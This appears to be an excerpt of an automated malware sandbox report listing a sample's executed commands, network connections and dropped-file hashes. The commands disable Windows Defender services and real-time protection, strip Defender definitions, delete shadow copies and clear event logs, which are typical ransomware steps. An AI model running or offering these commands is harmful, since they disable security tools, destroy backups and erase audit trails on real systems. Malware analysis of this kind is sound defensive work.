reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl application
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
| Country | Destination | Domain | Proto |
| US | 52.109.12.20:443 | | tcp |
| US | 8.8.8.8:53 | time.windows.com | udp |
| NL | 40.119.148.38:123 | time.windows.com | udp |
| NL | 84.53.175.107:80 | | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 1c19c16e21c97ed42d5beabc93391fc5 |
| SHA1 | 8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68 |
| SHA256 | 1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05 |
| SHA512 | 7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5d8bf6eced4d0a80279646c6a37b9a4f |
| SHA1 | 1481dccc6b3a854d4e47bbac5b47192c4aa1f7e4 |
| SHA256 | cc60d80176eb96fc3f40b32201c4359942ccf293ba514832f4634dbd42d64c1c |
| SHA512 | 0a07227bd5705d99e6b48fe5e71dac9abdc5c72e831cebf6493fcb9a88b91422d3814f9ac45fddb60a2c70c26f24428a956cb7cddd25eaa0b5fc8c7c454afbc4 |